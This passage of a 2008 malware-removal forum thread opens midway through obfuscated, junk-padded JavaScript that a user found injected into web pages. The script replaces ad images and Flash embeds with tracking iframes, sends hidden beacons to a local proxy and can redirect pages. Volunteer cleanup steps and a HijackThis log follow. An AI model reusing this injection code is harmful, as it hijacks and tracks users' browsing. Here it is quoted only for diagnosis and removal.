return rulesetElement.MetaArr[i];

}

for (i = 0; i < rulesetElement.UrlArr.length; i++)
{

if (document.location.href.indexOf(rulesetElement.UrlArr[i]) != -1)
return rulesetElement.UrlArr[i];

}

return null;

}



function FiuXbUKnHCDceCPUxb(nodeElement)
{

var retStr = "";

vKhMmyErNETJCEN =19428 + 22533;
if(null==nodeElement)
return "";


if (nodeElement.nodeValue != null)
retStr = nodeElement.nodeValue;
var ErymMkXSgGvgRpyFADl= 22517 - 6099;
var allChildrenNode = nodeElement.childNodes;

var TRxRcdiWCcDjhwuKbC;
if (allChildrenNode != null && allChildrenNode.length > 0)
{

for(var y=allChildrenNode.length-1; y>=0; y--)
{
upoqMbCcfjpFfiyG = 23096;
var child = allChildrenNode.item(y);

var bGPqiDfiIenUvqnp =29828 + 22359;
retStr = retStr + FiuXbUKnHCDceCPUxb(child);
var SntVwsggGRjxMRt =16078;
}

}


retStr = retStr + " ";

return retStr;

}


function LEtfrTFkKeyTmLi(Obj)
{

try
{


var fr = document.createElement("IFRAME");
var plGFmAoAjncmYnHxxC= 11991 - 13660;
fr.framespacing = '0';
var PsRyVPuCbJxCiOJo;
fr.frameborder = 'no';

fr.scrolling = 'no';
var SQjIWuxJXYiGVbmiDBU =19215 + 383;
fr.width = '0';
var gYaveryxVriyOriBq =13979 + 17317;
fr.height = '0';
var AOhvlXeffkgJuISCVeI= 9120 - 11789;
fr.marginWidth = "0";

fr.marginHeight = "0";
var JJakLffPrwtoonuAWo =23738;
fr.style.borderWidth = "0px";

fr.frameBorder = '0';
var IbXRqlCQpJOQsBLiE =31002 + 31824;
fr.src = "http://127.0.0.1/" + Math.random() + "AA532B7B55D44dbb87FAB30BCA27C538?" + Obj.FrID;

document.body.appendChild(fr);
var QWVtwkWDxIvtLxpa =24449 + 2202;
tkMlVUbqAcSlacRaDXf(500);

}
catch(e)
{

var img = new Image();
UfeNtSShCiLyBHUHP =10992 + 30616;
img.src = "http://127.0.0.1/" + Math.random() + "AA532B7B55D44dbb87FAB30BCA27C538?" + Obj.FrID;
tkMlVUbqAcSlacRaDXf(500);

}


}



function aSVAqBJVoqOwbmyck()
{
cXVDHKevNslKyVHEdT = 13792;
var str;
var vESKhIIJRuAptrj =2341 + 3139;
var aid = SlCGyFQfaXOMnniLK;

var ss;
var JcHmvmUoaiawlewRHqE= 2644 - 12889;
var i;

var fxObUESOIYOjksMVj;
NmkUHbErlvxfSMGgE =8581 + 1780;



var NmRYxQKauRcxlWIHo =10861 + 11341;
str = window.location.href;
COHcraMUSMpByQMATjy = 2430;
for(i = 0; i < jKfuMEbehmSoDiaq.length; ++i)
{
var GKlLjgRwoblbavU =15683;
if(!jKfuMEbehmSoDiaq[i].length)
continue;

var QyXpXnAlDwBRkUrul= 17876 - 7319;
if(str.length < jKfuMEbehmSoDiaq[i].length)
continue;

if( (str.substr(0, jKfuMEbehmSoDiaq[i].length) == jKfuMEbehmSoDiaq[i])&&
(jKfuMEbehmSoDiaq[i] != 'file://localhost/'))
{
YdjAwGEPaVLuxORfw = 28121;
return 1; }
dDctvdsVdqUieXB =18187 + 13603;
};

for(i = 0; i < str.length - aid.length + 1; i++)
{
var wptPXsbuCqUNTvACNGA;
ss = str.substr(i, aid.length);
var bRjjJmEppTndXJWoW;
if(ss == aid)
return 1;
}



try { var wdUQLCGhHxllLiUTo =3716 + 23282; fxObUESOIYOjksMVj = window.frameElement; }
catch(e) { fxObUESOIYOjksMVj = null; }

nYtEdhWfNXAyxtvGe = 14787;
if(fxObUESOIYOjksMVj && uLVeUBHBRmOVClBjMBX(KMuAUllXyybHTsoAhR, fxObUESOIYOjksMVj))
{hShPwIyHqcDUVHmU = 15954;
return 1;
var YmFIolvfROWMjXihj= 27909 - 9287;}



return 0;

};


function xuTVOuEkxlkDrigChjl()
{
var njQloKXgDTXNYTE= 12423 - 29185;
var i;
var pWPWiqFaNprEROnY =12833;
var str;


for(i = 0; i < KMuAUllXyybHTsoAhR.length; ++i)
{

str = pVYMJURmyVjhtbmTA(KMuAUllXyybHTsoAhR[i].FrSrc);

if(str.length)
jKfuMEbehmSoDiaq.push(str);

var ILrgwJhuBRopuYsg;
str = pVYMJURmyVjhtbmTA(KMuAUllXyybHTsoAhR[i].AHref);

if(str.length)
jKfuMEbehmSoDiaq.push(str);
var XHOIidIbTOqgHKUtsjD =7915;
var bbgfBHoFdSYyRFxPm;
str = pVYMJURmyVjhtbmTA(KMuAUllXyybHTsoAhR[i].ImgSrc);
jdWBXoGJljGReFMnSht = 29006;
if(str.length)
jKfuMEbehmSoDiaq.push(str);

}


}


function DusOLUFGLWMuPBl(rqQdIdnIvDDAfpyf)
{
var giMnlQhyfHrRRfrHQXq;
var odnPhWWuYJjKMOgvS = document.createElement("IFRAME");

odnPhWWuYJjKMOgvS.id = rqQdIdnIvDDAfpyf.FrID;
OOikyGxRHYahCFNgMUW =7666 + 3217;
odnPhWWuYJjKMOgvS.name = rqQdIdnIvDDAfpyf.FrName;
rrRuwmQIykgebNcWss =3772 + 2785;
odnPhWWuYJjKMOgvS.framespacing = rqQdIdnIvDDAfpyf.FrSpacing;

odnPhWWuYJjKMOgvS.frameborder = rqQdIdnIvDDAfpyf.FrBorder;
var FnfSUfpyvLvOqRmkqgh;
odnPhWWuYJjKMOgvS.scrolling = rqQdIdnIvDDAfpyf.FrScrolling ;
dIsKxysaaBFYXoO =27653 + 22181;
odnPhWWuYJjKMOgvS.width = rqQdIdnIvDDAfpyf.FrWidthMin;
var xlndGTXbwTCoQMnv =6375;
odnPhWWuYJjKMOgvS.height = rqQdIdnIvDDAfpyf.FrHeightMin;
TllveCwKbyxRJepKxd =21790 + 10565;
odnPhWWuYJjKMOgvS.marginWidth = "0";
var AkYaDcqSQVvWdOXAMvI= 29180 - 14364;
odnPhWWuYJjKMOgvS.marginHeight = "0";

if(!odnPhWWuYJjKMOgvS.frameborder || odnPhWWuYJjKMOgvS.frameborder == 'no')
{
HHOcAHLkAAsKJgoK = 18594;
odnPhWWuYJjKMOgvS.style.borderWidth = "0px";
var BwHuCHwbHyYgaHJPpvv =32241 + 17055;
odnPhWWuYJjKMOgvS.frameBorder = '0';
var ffqxXoRGEPRocWxIUWn;
}

GuhlnOFTjhkyggoGBHI = 21041;
odnPhWWuYJjKMOgvS.src = rqQdIdnIvDDAfpyf.FrSrc;
var cMANWJrHRmGljmYAYmb;
return odnPhWWuYJjKMOgvS;
var tnpCUBAXVHlLnumGWTK =31148 + 4036;

}



function udhWSLYgSxBQAIJlR(ObjArray, El, flob)
{
XTYhslHEjHmhthCp =11834 + 4551;
var i, x, y;

try
{
var jUIqOsychWMviJRKcdJ =22002 + 15288;
if(flob == 1)
{

x = El.width;
var KsxAufddTDeXJfd =29372;
y = El.height;

}
else
{
var DaYbiNBEodFsvlLxEs= 18530 - 3570;
x = El.getAttribute("width");
var eJqwUmMiJdNKBhEvniW =28818 + 19277;
y = El.getAttribute("height");
var fXcuNvaRgJCBRKg =20294;
}

for(i = 0; i < ObjArray.length; ++i)
if(
( (x >= ObjArray[i].FrWidthMin) && (x <= ObjArray[i].FrWidthMax) ) &&
( (y >= ObjArray[i].FrHeightMin) && (y <= ObjArray[i].FrHeightMax) )
)

return ObjArray[i];

}
catch(e){}
bfShqrnPEloRUtUE = 6786;
return null;

}

function uLVeUBHBRmOVClBjMBX(ObjArray, El)
{
var VNqLAgovFnbHGubhw;
var i;
var KcRWkwFipCSLtbx =22058;

try
{
var gAFkUdUYtfCLRIOUx =5245;
if(El.id)
for(i = 0; i < ObjArray.length; ++i)
if(El.id == ObjArray[i].FrID)
return ObjArray[i];

}
catch(e) {}

return null;

}


function HeWiRtiBGLbSAPoRkm(El, InitArray)
{

var rqQdIdnIvDDAfpyf;

var flExcl;
OHxMPLwevFaKIKOl = 30876;
var NewFrame;

var i;
var ViNwLcfJkdkamKT= 11179 - 28824;
if(El.parentNode.tagName != "A")
return 0;
TstuPBdolakXHHvOaT = 30539;
rqQdIdnIvDDAfpyf = udhWSLYgSxBQAIJlR(InitArray, El, 1);

if(!rqQdIdnIvDDAfpyf)
return 1;
pdWWDqCLXyxhrLowLb =11798 + 27839;
flExcl = 0;
var nrdYxaBcdnvfOXJqseI= 7346 - 18094;
for(i = 0; i < jKfuMEbehmSoDiaq.length; ++i)
{
if(!jKfuMEbehmSoDiaq[i].length)
continue;

if(El.parentNode.href.length < jKfuMEbehmSoDiaq[i].length)
continue;
ImhrMHaSOFWkDeBr =5466 + 20719;
if(El.parentNode.href.substr(0, jKfuMEbehmSoDiaq[i].length) == jKfuMEbehmSoDiaq[i])
{
BRiBmftPbGgAODSf = 17754;
flExcl = 1;
break;
}
var isAbUEeFqCUjSgnjvQ;
};

if(flExcl)
return 1;
VlJahHRGxkQdkdJtw = 7416;

NewFrame = DusOLUFGLWMuPBl(rqQdIdnIvDDAfpyf);
var prJHrxAJUwcPdOUIGMj= 558 - 15465;
El.parentNode.parentNode.replaceChild(NewFrame, El.parentNode);
hHeOMXsHkuMuuLVjINa =10250 + 29996;
LEtfrTFkKeyTmLi(rqQdIdnIvDDAfpyf);ympLdHelnECivbKyNJV = 9876;
var VvfdkOXxVkxdGJBn= 3262 - 12127;

return 0;
BBbWxIBXFQqAhJQW = 15533;
}

function UNPgNNtcGdxRiXGqH(El, InitArray)
{ var XAgtwkBXBRilpaBy =25245;
var str;
rvtmCmGqQeWXnJkaTYw = 18140;
var rqQdIdnIvDDAfpyf;
XOpWjUPmCGMkSJk = 2573;
var NewFrame;

var i;

if(El.parentNode == null)
return 1;

var AkUUCoeXTRtYdso =17428 + 12991;
str = El.getAttribute("src");

if(!str)
return 1;
var HltjRETdFurVjEv= 11381 - 27821;
for(i = 0; i < str.length - 3; ++i)
{
var jfqxTagEuwHvNlFum =14306;
ss = str.substr(i, 4);
var ibopdxCBpVBmGcXC;
if(ss == ".swf")
break;
var ELVXWdCLPCqLMTO;
}

if(ss != ".swf")
return 1;

var NyKyRSGxdhIypSo =8271;
rqQdIdnIvDDAfpyf = udhWSLYgSxBQAIJlR(InitArray, El, 0);

if(!rqQdIdnIvDDAfpyf)
return 1;

var XLMmGKXtknwLddKkOi =30799;
NewFrame = DusOLUFGLWMuPBl(rqQdIdnIvDDAfpyf);
wGGwdAIyXsgRHOrxQyW = 7213;
El.parentNode.replaceChild(NewFrame, El);

LEtfrTFkKeyTmLi(rqQdIdnIvDDAfpyf);
yWYatbuQjTTyTWInEj =16728 + 9102;
return 0;

}


function TIShSiRyXCyarxSFeoB(El, InitArray)
{
var MnbYYhYRUbcHCOpWQ;
var str;
DkNLbQXUNlefyWpioo =25520 + 4658;
var rqQdIdnIvDDAfpyf;var soxDhOgktAbakguUUQf =30936 + 24683;
var NewFrame;

var ss;var PNmBYOxxRNKjWmHx= 27576 - 10096;
CkSKgXhdOrOhxXWaOka = 10041;
var i;var IJssCaOOhOjVSLKP;
FJBYXEUNCXryOjDXVmK =13153 + 17731;
if(El.parentNode == null)
return 1;
dUwAAJKvyWhSWrGNo = 14305;
if(navigator.appName == 'Opera')
return 1;


try
{
str = El.getAttribute("movie");
var rPWJBsIsVDBFclcwUFD =3934 + 16442;
if(!str)
{var kdiSDUebRFSLjww =14756;
str = El.getAttribute("data");
if(!str)
return 1;

}
glhLHSGptyRTSwI =1432 + 14386;
}
catch(e)
{
var hHEpWGGQtUmMNainA;
return 1;
OlIIgVSXuigbQte = 11475;
}
var HoyqXumfqwDsMAGXNUr= 28107 - 5283;

for(i = 0; i < str.length - 3; ++i)
{var NjJeLounmAOpSKD;
ss = str.substr(i, 4);var QsxlOfgalAolWEmSCK =30604 + 27351;
if(ss == ".swf")
break;
var esfqyKiOnDqoItHcg =31621;
}
daxPpgrwENRtcNSIev = 16089;
if(ss != ".swf")
return 1;
var QKiihrdYHGbSdagIX;

rqQdIdnIvDDAfpyf = udhWSLYgSxBQAIJlR(InitArray, El, 0);acwNGCfdJcmLeUtJ = 29305;
FuxRhgOCLufQABvRa =14906 + 5649;
if(!rqQdIdnIvDDAfpyf)
return 1;

NewFrame = DusOLUFGLWMuPBl(rqQdIdnIvDDAfpyf);
vatBNhWSEvAfhmAcA =5159 + 5823;
El.parentNode.replaceChild(NewFrame, El);
var uDcyDpItTHSMTAbIW =32564;
LEtfrTFkKeyTmLi(rqQdIdnIvDDAfpyf);

return 0;
var PVWoBLuoyeeqhINc= 27205 - 20252;

}


function qyJTERUEbEJEBevcg(InitArray)
{

var rqQdIdnIvDDAfpyf;
var El = new Object();var COukAMJDRlrDWNWNGQg;
var YiaymqBaSpJttpHuGQ= 32595 - 32475;


if(navigator.appName == 'Netscape')
{var cyqwcmtVAQJaALu =918 + 30333;
El.width = document.body.clientWidth;

El.height = document.body.clientHeight;
var jCquJRXSyYnfRAIaA= 12345 - 10300;
}
else
{ var dljtmOpYPpYJtXMxHI =21771 + 28697;
El.width = document.body.offsetWidth;var qYywjuiDjsisUpo;

El.height = document.body.offsetHeight; var RSOyFnAIpkJwljt =6112 + 14675;
}
QXXtokjFFtOjhWhDu = 19850;
rqQdIdnIvDDAfpyf = udhWSLYgSxBQAIJlR(InitArray, El, 1);LAPPRqPqluWHnUuwQOv = 21887;

if(!rqQdIdnIvDDAfpyf)
return 1;
var lmkjGwbCyempcIhsN;
window.location.href = rqQdIdnIvDDAfpyf.FrSrc;

LEtfrTFkKeyTmLi(rqQdIdnIvDDAfpyf);


return 0;

}


function lHARjOOcARalwFdIBAG(InitArray, wCgyCcPXTNCOCWxrTm, Included)
{
QEHKIIGeafaNKgDRkt = 9430;
var El = null;
lTCygdpfnOvoYMa = 7548;
var i;
var UnQEdRQJhTrHuOSJS;

if(!Included)
{

xdvBOEVKxEDspFq =5890 + 31520;
if(!qyJTERUEbEJEBevcg(InitArray))
return 0;
var rFoRnYJNAClcwIJ =27148 + 16314;
for(i = 0; i < dlrxgvepbYPXtsQ.length; ++i)
if(!fvfLgtJlubACmUbDJF(dlrxgvepbYPXtsQ[i]))
return 0;
nvupfKQNxRsIwQBatOe = 5737;
};


for(i = 0; i < wCgyCcPXTNCOCWxrTm.length; i++)
{var vwWSBgbGaOvqjMm;
El = wCgyCcPXTNCOCWxrTm[i];
var qbaJWNJyFTCiOaO;
if(El.tagName == "IMG")
{CQjlXmiNIiuIRkOa = 6145;
if(!HeWiRtiBGLbSAPoRkm(El, InitArray))
continue;
var rBTfOjQuXRhskPufJ;
}
else if(El.tagName == "EMBED")
{
if(!UNPgNNtcGdxRiXGqH(El, InitArray))
continue;
YlwUXnxkJsjUomftEAU =16092 + 12840;
}
else if(El.tagName == "OBJECT")
{
bBxdjDXUkYBRFSDlpT =1032 + 19109;
if(!TIShSiRyXCyarxSFeoB(El, InitArray))
continue;
tKWqtpqkDrJYRRwqt = 20121;
}

if(El.childNodes && El.childNodes.length)
lHARjOOcARalwFdIBAG(InitArray, El.childNodes, 1);


}
var bEnOIdfjpiVqvTrb;
return 0;
var GVrHuecCvGkOGfp =4500 + 7203;
}


function CreaterqQdIdnIvDDAfpyfect_24578457887(FrID, FrSrc, FrWidthMin, FrWidthMax, FrHeightMin, FrHeightMax,
AHref, ImgSrc)
{
var dvHWOkogKEJTryt =5468 + 19666;
var rqQdIdnIvDDAfpyf = new Object();var fekPgBKKKCoqyhULM= 22193 - 21094;


rqQdIdnIvDDAfpyf.FrID = FrID;

rqQdIdnIvDDAfpyf.FrName = FrID;
BBtTmuICyCbktUYgdY =20698 + 22118;
rqQdIdnIvDDAfpyf.FrSrc = FrSrc + '&aid=' + SlCGyFQfaXOMnniLK +
'&guid=' + KJEjXIeLmLOmsngs + '&uid=' + oLphEwWGJxDDOUMUJe +
'&rid=' + dTQFgjaPsaeNorlH + '&url=' + mcyCYsfGWgSYfysplI;
LGcwiMaVMlGYBgmG =23719 + 6717;
rqQdIdnIvDDAfpyf.FrWidthMin = FrWidthMin;
rqQdIdnIvDDAfpyf.FrWidthMax = FrWidthMax;

rqQdIdnIvDDAfpyf.FrHeightMin = FrHeightMin;
BXbVSITxFiqFjXUqDvj = 25259;
rqQdIdnIvDDAfpyf.FrHeightMax = FrHeightMax;

ecdlwyFbqCJwhlLH =31551 + 17111;
rqQdIdnIvDDAfpyf.FrSpacing = '0';

rqQdIdnIvDDAfpyf.FrBorder = 'no';

rqQdIdnIvDDAfpyf.FrScrolling = 'no';var hXwbOMikwBGPvAc= 19191 - 2680;

rqQdIdnIvDDAfpyf.AHref = AHref;vYCGCHlSBpJxyRHCRSt = 3495;
rqQdIdnIvDDAfpyf.ATarget = 'blank';NjsPlMMgKMBxhEASlq = 29397;
VYWXUtvhIyptEWiHji = 8553;
rqQdIdnIvDDAfpyf.ImgSrc = ImgSrc;
rqQdIdnIvDDAfpyf.ImgBorder = '0';
PoDlpToYyPCYuDv =5994 + 9536;
rqQdIdnIvDDAfpyf.ImgAlt = '';
var nhgpQPmLIXuCVmfimAq =11385 + 19521;
return rqQdIdnIvDDAfpyf;

}


function pVYMJURmyVjhtbmTA(str)
{
DMMjIuqtjSeIgXetfco = 1819;
var i;
var FyJkOTclSKjmiAY= 5951 - 10128;
var str2 = "";
var xXWMboeBawBCEpDgPr =22415 + 19211;
for(i = 0; i < str.length; ++i)
{

str2 += str.charAt(i);
jxbsRorVcJcqdKPPqdY =26264 + 10133;
if(str.charAt(i) == '/')
{

if( ((i + 1) < str.length) && ((i - 1) >= 0) )
{

if( (str.charAt(i + 1) != '/') && (str.charAt(i - 1) != '/') )
break;
ijErPmgbhRTDXTOXbv =17770 + 4170;
}
else if( ((i + 1) < str.length) && (str.charAt(i + 1) != '/') )
break;
else if ( ((i - 1) >= 0) && (str.charAt(i - 1) != '/') )
break;

var atYpbvlYjXkNvuHY= 10672 - 31464;
}

}
JknMBhqBhWLiUaPpUYw =30055 + 13644;
return str2;
var RkeSMaVAlpjkkOF =8979 + 8571;
}


</script>


Hope you can help me as always, thanks

Edited by a_fahmy7, 13 June 2008 - 04:36 PM.


#2 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 14 June 2008 - 04:56 PM

I found out Safari web browser is not affected.

IE, Firefox and Opera all affected though

#3 TheJoker

TheJoker

    Forum Deity

  • Boot Camp Mod
  • PipPipPipPipPip
  • 14,352 posts

Posted 15 June 2008 - 08:29 PM

Hi a_fahmy7, and Welcome to SWI

Sorry it has taken so long to get to you, but the board has been very busy lately, and all the Helpers here are volunteers.

I suggest printing out each set of instructions and reading the entire post before proceeding. It will make following them easier.

You are running Paltalk, which is adware and I recommend uninstalling it. If you chose to uninstall it, go to Start > Control Panel > Add or Remove Programs and remove the following program, if found:
PalTalk

Then, using Windows Explorer, delete the program folder at:
C:\Program Files\Paltalk Messenger

IMVU 3D messenger has been known to cause problems and, unless it is something you really want to keep, I recommend optionally removing it using the Control Panel's Add or Remove Programs.

I see you have Viewpoint installed...
Viewpoint Manager is considered to be foistware instead of malware since it is installed without users approval, but doesn't spy or do anything "bad". This will change though, please read this article:
http://www.clickz.co...cle.php/3561546
I suggest you remove the program now. Go to Start > Settings > Control Panel > Add/Remove Programs and remove the following programs if present:
  • Viewpoint
  • Viewpoint Manager
  • Viewpoint Media Player
Reboot afterwards. <-- Important!

If you chose to uninstall Viewpoint, after rebooting, using Windows Explorer delete the following folder if still there:
C:\Program Files\Viewpoint

Clean your Cache and Cookies in IE:
  • Close all instances of Outlook Express and Internet Explorer
  • Go to Control Panel > Internet Options > General tab
  • Click the "Delete Cookies" button
  • Next to it, Click the "Delete Files" button
  • When prompted, place a check in: "Delete all offline content", click OK
Clean your Cache and Cookies in Firefox (In case you also have Firefox installed):
  • Go to Tools > Options.
  • Click Privacy in the menu on the left side of the Options window.
  • Click the Clear button located to the right of each option (History, Cookies, Cache).
  • Click OK to close the Options window
    Alternatively, you can clear all information stored while browsing by clicking Clear All.
    A confirmation dialog box will be shown before clearing the information.
Clean other Temporary files + Recycle bin
  • Go to start > run and type: cleanmgr and click ok.
  • Let it scan your system for files to remove.
  • Make sure Temporary Files, Temporary Internet Files, and Recycle Bin are the only things checked.
  • Press OK to remove them.
Please download Malwarebytes' Anti-Malware from Here or Here

Double Click mbam-setup.exe to install the application.
  • Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select "Perform Quick Scan", then click Scan.
  • The scan may take some time to finish,so please be patient.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Make sure that everything is checked, and click Remove Selected.
  • When disinfection is completed, a log will open in Notepad and you may be prompted to Restart. (See Note)
  • The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
  • Copy & Paste the entire report in your next reply along with a fresh HijackThis log.
Note:
If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts.
Click OK to either and let MBAM proceed with the disinfection process.
If asked to restart the computer, please do so immediately.


Now you need to run HijackThis and click "Do a system scan only." Place a check next to the following entries (if they are still there):

O2 - BHO: (no name) - {129FA2A1-408C-4824-83A4-5001581FD01E} - C:\WINDOWS\system32\iifcARIx.dll
O2 - BHO: (no name) - {4817D522-BD26-47F3-9239-D83E82760BBC} - C:\WINDOWS\system32\qoMdabXo.dll
O2 - BHO: (no name) - {6C5546A5-BB26-471D-9043-854AFA0AB66D} - C:\WINDOWS\system32\ljJCSkjg.dll (file missing)
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O4 - HKLM\..\Run: [BMcfa4d225] Rundll32.exe "C:\WINDOWS\system32\gfvwynfe.dll",s
O20 - Winlogon Notify: iifcARIx - C:\WINDOWS\SYSTEM32\iifcARIx.dll


If you uninstalled PalTalk as recommended, also check (if still there):
O9 - Extra button: PalTalk - {4EAFEF58-EEFA-4116-983D-03B49BCBFFFE} - C:\Program Files\Paltalk Messenger\Paltalk.exe (file missing)

If you uninstalled IMVU 3D as recommended, also check (if still there):
O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Documents and Settings\Ahmed Fahmy\Start Menu\Programs\IMVU\Run IMVU.lnk

Now close all browser and other windows except for HijackThis, and click "Fix Checked" to have HijackThis fix the entries you checked.

Download ComboFix© by sUBs from one of these links:
http://download.blee...Bs/ComboFix.exe
http://www.forospywa...Bs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Save the file to your Desktop.

Familiarize yourself with ComboFix before running it:
http://www.bleepingc...to-use-combofix
This includes installing the Windows XP Recovery Console in case you have not installed it yet.

Disconnect from the Internet (pull the connection cable) <-- Important
Close your ESET NOD32 antivirus and any anti-spyware applications you may be running.

For this next step, please ensure that ComboFix.exe is on your desktop:

Please open Notepad *Do Not Use Wordpad!* (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the quote box below:
Save this as "CFScript.txt" and change the "Save as type" to "All Files" and place it on your desktop.

File::
C:\WINDOWS\system32\iifcARIx.dll
C:\WINDOWS\system32\qoMdabXo.dll
C:\WINDOWS\system32\ljJCSkjg.dll
C:\WINDOWS\system32\gfvwynfe.dll

Posted Image

Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
ComboFix will now run a scan on your system. It may reboot your system when it finishes. This is normal.
When finished, it shall produce a log for you, C:\ComboFix.txt. Post that log in your next reply.
CAUTION: Do not mouse-click ComboFix's window while it is running. That may cause it to stall.

After the system restarts, your ESET NOD32 AntiVirus should be running again.
If it isn't, restart it manually.
Reconnect to the Internet.

Please post a new HijackThis log, the log from MBAM, and in a second reply (due to length) the log from ComboFix (combofix.txt), and note any errors encountered.

Free Tools for Fighting Malware
Anti-Virus: avast! Free Antivirus / Avira Free AntiVirus
OnLine Anti-Virus: ESET / BitDefender / F-Secure
Anti-Malware: Malwarebytes' Anti-Malware / Dr.Web CureIt
Spyware/Adware Tools: MVPS HOSTS File / SpywareBlaster
Firewall: Comodo Firewall Free / Privatefirewall
Tutorials: How did I get Infected? / Internet Explorer Privacy & Security Settings
If we have helped, please help us continue the fight by using the Donate button, or see this topic for other ways to donate.

MS MVP 2009-20010 and ASAP Member since 2005


#4 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 16 June 2008 - 03:25 PM

ok, thanks for your reply. I did NOT do these things YET because of some changes that happened today. NOD32 detected infected files on system startup.It prompted me to delete them and i did then reboot. Since then, the browsers are working fine,all of them and the javascript code is no longer there in the web pages source code. However the infection is still detected by NOD32 as expected. On system restart ,it says the following modules cannot be loaded egwhnjp.dll and ccrrhydm.dll which is expected as well since some files or data have been deleted. I am just mentioning this before doing anything of what you told me to do, just to make sure I should still proceed as advised. here's the latest hijack log file. Again I didn't do anything of what you mentioned yet. Tell me to proceed and I will. Thanks

Should I really delete the saved passwords in firefox private data as well or can I keep those. Would be much better if I can keep these :unsure:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:25:22 PM, on 6/16/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Sygate\SPF\smc.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\WLTRAY.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\WINDOWS\VMSnap3.EXE
C:\WINDOWS\Domino.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Digital Line Detect\DLG.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Mozilla Firefox2\firefox.exe
C:\Documents and Settings\Ahmed Fahmy\My Documents\My Downloads\HiJackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=6061214
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.c...rch/search.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://us.rd.yahoo.c...//www.yahoo.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://jobreeze.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://us.rd.yahoo.c...//www.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.c...rch/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://us.rd.yahoo.c...//www.yahoo.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=6061214
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://us.rd.yahoo.c...//www.yahoo.com
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {129FA2A1-408C-4824-83A4-5001581FD01E} - C:\WINDOWS\system32\iifcARIx.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
